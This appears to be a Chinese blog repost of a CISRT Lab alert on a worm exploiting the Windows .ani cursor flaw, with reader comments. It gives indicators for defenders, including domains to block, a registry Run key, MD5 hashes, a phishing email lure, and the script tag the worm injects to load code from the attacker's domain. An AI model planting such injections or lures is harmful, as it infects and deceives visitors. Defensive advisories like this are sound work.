利用微软动画光标漏洞的复合型蠕虫现身

信息来源:CISRT Lab

一个非常不好的消息要告诉大家,利用微软动画光标漏洞的新蠕虫已经现身。我们收到了相关的样本,通过分析,我们已经确认这是一个复合型蠕虫,含有类似熊猫烧香的感染功能、下载其他病毒的功能、发送含有最新.ani漏洞网址邮件的功能、感染html等文件并向这些文件里添加含有最新漏洞网址的功能。由于危险程度非常高,CISRT Lab决定再次发布中度风险警报,提醒广大网友提高警惕!

同时我们建议广大网友、企业网管对以下两个域名进行屏蔽:

2007ip.com
microfsot.com

蠕虫的大小在13K左右,会释放文件到以下目录:

%SYSTEM%\sysload3.exe

添加注册表键值:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"System Boot Check"="%SYSTEM%\sysload3.exe"

会发送邮件:

From: [email protected]
To: [QQ号码]@qq.com
Subject:你和谁视频的时候被拍下的?给你笑死了!
Body:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://macr.microfsot.com/<removed>/134952.htm

感染.HTML .ASPX .HTM .PHP .JSP .ASP和 .EXE文件,并向.HTML .ASPX .HTM .PHP .JSP .ASP文件里植入以下代码:

<script src=http://macr.microfsot.com/<removed>.js></script>

注意邮件和网页中提到的网址中都含有.ani 0-day漏洞的恶意文件。

Kaspersky检测为Trojan-Downloader.Win32.Agent.bky,毒霸命名为Worm.MyInfect

目前我们收到样本的MD5值为

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179

相关日志

楼被抢了 6 层了... 抢座Rss 2.0或者 Trackback

  • avvcd

    又是一场腥风血雨.

  • 鬼仔

    重要的是微软到现在还没补丁发出来。

  • avvcd

    暂时有没有好的方法预防?

  • 4evil

    又见microfsot.com 这个站..

  • 鬼仔

    有方法:
    临时解决方法1:
    地“开始”菜单“运行”里输入"gpedit.msc"
    在后在“本地计算机”策略 => 用户配置 => 管理模板 => 系统 => 停止命令提示符 设置为“启用”!
    并把“他停用命令提示符脚本处理吗”选为“是”,再按确定!

    临时解决方法2:
    设置
    C:\Documents and Settings\Administrator\Local Settings
    目录的权限设置为不能运行! Administrator 是你的用户目录

  • 鬼仔

    貌似这个站挺出名

发表评论